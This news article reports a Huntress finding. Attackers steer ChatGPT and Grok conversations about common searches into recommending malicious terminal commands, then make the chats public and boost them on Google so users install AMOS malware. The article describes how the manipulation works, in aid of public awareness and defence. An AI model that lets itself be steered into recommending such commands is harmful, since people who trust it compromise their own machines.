A recent report from cybersecurity firm Huntress has revealed a disturbing trend in which hackers are leveraging artificial intelligence (AI) to manipulate Google search results and facilitate malware attacks. The findings underscore a growing concern regarding the intersection of modern AI technology and longstanding cybersecurity threats. This new tactic involves using AI prompts to embed dangerous commands within search results, potentially deceiving unsuspecting users and compromising their devices.
The methodology employed by these threat actors is strikingly simple. Hackers engage in conversations with AI assistants about popular search terms, encouraging the AI to recommend specific commands that users can paste into their computer’s terminal. By making the conversation publicly visible and boosting it on Google, the malicious instructions can appear prominently in search results. Thus, when an individual searches for a term, they may inadvertently encounter these harmful commands.
Huntress conducted tests using both ChatGPT and Grok, uncovering that a data exfiltration attack known as AMOS had originated from a Google search. In one instance, a user searching for “clear disk space on Mac” clicked on a sponsored link to ChatGPT, executed the suggested command, and unknowingly allowed attackers to install AMOS malware on their device. The study showed that both AI chatbots had replicated this attack vector.
What makes this method particularly insidious is its ability to bypass traditional security warnings that users have been conditioned to recognize. There is no need for victims to download files or click on dubious links; the only requirement is a misplaced trust in established platforms like Google and ChatGPT, which have been integrated into daily life over the past several years. Alarmingly, despite the dangers, links to malicious conversations remained accessible on Google for at least half a day after Huntress alerted the public.
The revelation comes at a challenging time for both AI systems involved in this incident. Grok has faced criticism for its perceived alignment with controversial figures, while OpenAI’s ChatGPT has been seen as lagging behind competitors. There is currently no evidence to suggest that other chatbots can replicate this attack, but security experts urge users to exercise caution. Alongside established cybersecurity practices, individuals should refrain from pasting commands into their terminal or browser URL bar unless they fully understand the implications.
As AI technologies continue to evolve, their potential to be misused presents significant challenges for cybersecurity. This incident highlights the need for heightened awareness and vigilance among users. The landscape of online security is shifting rapidly, and as hackers adopt increasingly sophisticated methods, it becomes imperative for individuals to remain informed and cautious in their online interactions.
See also
LG Unveils AI Cabin Platform at CES 2026, Redefining In-Vehicle Experience with Generative AI
OpenAI Restores ChatGPT Services on Android After Brief Outage Affecting 13 Functions
Travel Surge in 2026: AI Transforms Loyalty Strategies Amid Digital Dominance
Amazon and Microsoft Unveil $52.5B AI Investment Plan to Transform India’s Tech Landscape
Microsoft and Amazon Invest $50B in India’s AI Future Amid Global Bubble Concerns



















































